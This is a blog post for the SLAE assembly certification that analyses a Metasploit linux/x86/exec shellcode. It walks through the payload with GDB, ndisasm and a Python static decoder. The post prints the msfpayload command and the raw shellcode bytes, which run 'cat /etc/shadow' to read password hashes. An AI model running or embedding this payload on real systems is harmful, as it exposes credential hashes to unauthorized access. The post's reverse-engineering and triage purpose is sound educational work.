Source: SecurityTube
I explain every line that needs an explanation; I hope it is explained well enough. If you don't understand something, leave me a comment and I will answer all questions.
1) First we generate the payload that we will analyse afterwards
msfpayload linux/x86/exec CMD='cat /etc/shadow' C

/*
 * linux/x86/exec - 51 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependFork=false, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependSetresgid=false, PrependSetregid=false,
 * PrependSetgid=false, PrependChrootBreak=false,
 * AppendExit=false, CMD=cat /etc/shadow
 */
unsigned char buf[] =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x63"
"\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
"\x57\x53\x89\xe1\xcd\x80";

Compilation:

gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode

The source of the .c wrapper can be found here: https://github.com/doomedraven/SLAE/tree/master/SLAEx32/Assignment%205
2) Analyzing with GDB
gdb -q ./shellcode

=> 0x0804a040 <+0>:  push   0xb                     ; 11 -> __NR_execve
   0x0804a042 <+2>:  pop    eax
   0x0804a043 <+3>:  cdq                            ; sign-extend eax into edx:eax -> edx = 0
   0x0804a044 <+4>:  push   edx                     ; 0
   0x0804a045 <+5>:  pushw  0x632d                  ; .decode('hex') -> '-c'
   0x0804a049 <+9>:  mov    edi,esp                 ; save pointer to -c
   0x0804a04b <+11>: push   0x68732f                ; hs/  ("/sh\0")
   0x0804a050 <+16>: push   0x6e69622f              ; nib/ ("/bin")
   0x0804a055 <+21>: mov    ebx,esp                 ; save pointer to /bin/sh
   0x0804a057 <+23>: push   edx                     ; NULL that terminates argv
   0x0804a058 <+24>: call   0x804a06d               ; jump to <+45>; the "return address" it pushes is the address of the string that follows
   0x0804a05d <+29>: arpl   WORD PTR [ecx+0x74],sp  ; <+29> .. <+44> are the bytes of "cat /etc/shadow\0", not code
   0x0804a060 <+32>: and    BYTE PTR [edi],ch
   0x0804a062 <+34>: gs
   0x0804a063 <+35>: je     0x804a0c8
   0x0804a065 <+37>: das
   0x0804a066 <+38>: jae    0x804a0d0
   0x0804a068 <+40>: popa
   0x0804a069 <+41>: outs   dx,DWORD PTR fs:[esi]
   0x0804a06b <+43>: ja     0x804a06d
   0x0804a06d <+45>: push   edi                     ; jump here and push pointer to -c
   0x0804a06e <+46>: push   ebx                     ; push pointer to start of /bin/sh
   0x0804a06f <+47>: mov    ecx,esp                 ; save pointer -> ecx = argv
   0x0804a071 <+49>: int    0x80                    ; syscall
   0x0804a073 <+51>: add    BYTE PTR [eax],al
End of assembler dump.
3) Looking with Ndisasm
msfpayload -p linux/x86/exec cmd='cat /etc/shadow' R | ndisasm -

-> removed
00000018  E81000    call word 0x2b
0000001B  0000      add [bx+si],al
0000001D  636174    arpl [bx+di+0x74],sp  ; cat
00000020  202F      and [bx],ch           ; /
00000022  657463    gs jz 0x88            ; etc
00000025  2F        das                   ; /
00000026  7368      jnc 0x90              ; sh
00000028  61        popaw                 ; a
00000029  646F      fs outsw              ; do
0000002B  7700      ja 0x2d               ; w\0
-> removed

Note that ndisasm decodes 16-bit code unless told otherwise, which is why the output shows "call word" and operands such as [bx+si]; pass -b 32 for 32-bit decoding. Either way, the bytes between the call and its target are the string "cat /etc/shadow\0", and a linear disassembler shows them as meaningless instructions, exactly as GDB did above.
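As an added example (not code from the original post), the following Python script ties sections 2 and 3 together: it walks the 51 payload bytes with a minimal decoder that knows only the handful of opcodes this payload family uses, treats the bytes a `call` jumps over as data rather than code, and recovers the execve argument vector without executing anything. This is the check a defender wants when triaging a captured exec-style shellcode blob. The function and variable names are my own, the decoder is not a general disassembler, and the payload bytes are taken from the msfpayload output above.

```python
import struct

# Constructed input: the 51-byte linux/x86/exec payload exactly as printed by
# msfpayload above (CMD='cat /etc/shadow').
SHELLCODE = bytes.fromhex(
    "6a0b58995266682d6389e7682f736800682f62696e89e352e810000000"
    "636174202f6574632f736861646f7700575389e1cd80"
)


def _printable(b: bytes) -> bool:
    return len(b) > 0 and all(0x20 <= c < 0x7F for c in b)


def walk_exec_payload(sc: bytes) -> dict:
    """Single linear pass with a tiny decoder for the opcodes this payload uses.

    Records: the syscall number loaded by 'push imm8; pop eax', the ASCII
    immediates pushed to build strings on the stack, and any NUL-terminated
    text that a 'call rel32' skips over (the call-over-string trick used to
    obtain a pointer to the command). When such a call is found, decoding
    resumes at the call target, so the string bytes are never misread as code.
    """
    pushed = []        # raw immediates of push imm32 / pushw imm16, in execution order
    call_strings = []  # text that a call jumps over
    syscall = None
    last_imm8 = None
    i = 0
    while i < len(sc):
        op = sc[i]
        nxt = sc[i + 1] if i + 1 < len(sc) else None
        if op == 0x6A and nxt is not None:                      # push imm8
            last_imm8 = nxt
            i += 2
        elif op == 0x58:                                        # pop eax -> eax = last imm8
            syscall = last_imm8
            i += 1
        elif op == 0x68 and i + 5 <= len(sc):                   # push imm32
            pushed.append(sc[i + 1:i + 5])                      # little-endian == memory order
            i += 5
        elif op == 0x66 and nxt == 0x68 and i + 4 <= len(sc):   # pushw imm16
            pushed.append(sc[i + 2:i + 4])
            i += 4
        elif op == 0xE8 and i + 5 <= len(sc):                   # call rel32
            rel = struct.unpack_from("<i", sc, i + 1)[0]
            start, target = i + 5, i + 5 + rel
            data = sc[start:target] if target > start else b""
            if target <= len(sc) and data.endswith(b"\x00") and _printable(data[:-1]):
                call_strings.append(data[:-1].decode("ascii"))
                i = target                                      # land where the call lands
            else:
                i += 5
        elif op == 0x89 and nxt is not None and nxt >= 0xC0:   # mov reg, reg
            i += 2
        elif op == 0xCD:                                        # int imm8
            i += 2
        else:                                                   # push/pop reg, cdq: one byte
            i += 1
    # The last push ends up at the lowest address, so reading the pushes in
    # reverse gives the strings as they sit in memory; split at the NUL bytes.
    stack_text = b"".join(reversed(pushed))
    stack_strings = [s.decode("ascii") for s in stack_text.split(b"\x00") if _printable(s)]
    # argv order follows how this payload builds it: /bin/sh, -c, <command>.
    return {
        "syscall": syscall,
        "stack_strings": stack_strings,
        "call_strings": call_strings,
        "argv": stack_strings + call_strings,
    }


if __name__ == "__main__":
    result = walk_exec_payload(SHELLCODE)
    print("syscall :", result["syscall"])        # 11 -> execve
    print("argv    :", result["argv"])           # ['/bin/sh', '-c', 'cat /etc/shadow']
```

Because decoding jumps from the `call` straight to its target, the bytes `63 61 74 20 ...` are reported as the command string instead of the `arpl`/`das`/`outsw` noise that both GDB and ndisasm printed; that is the practical difference between following control flow and sweeping bytes linearly.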
4) Generating .dot graph with Libemu
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: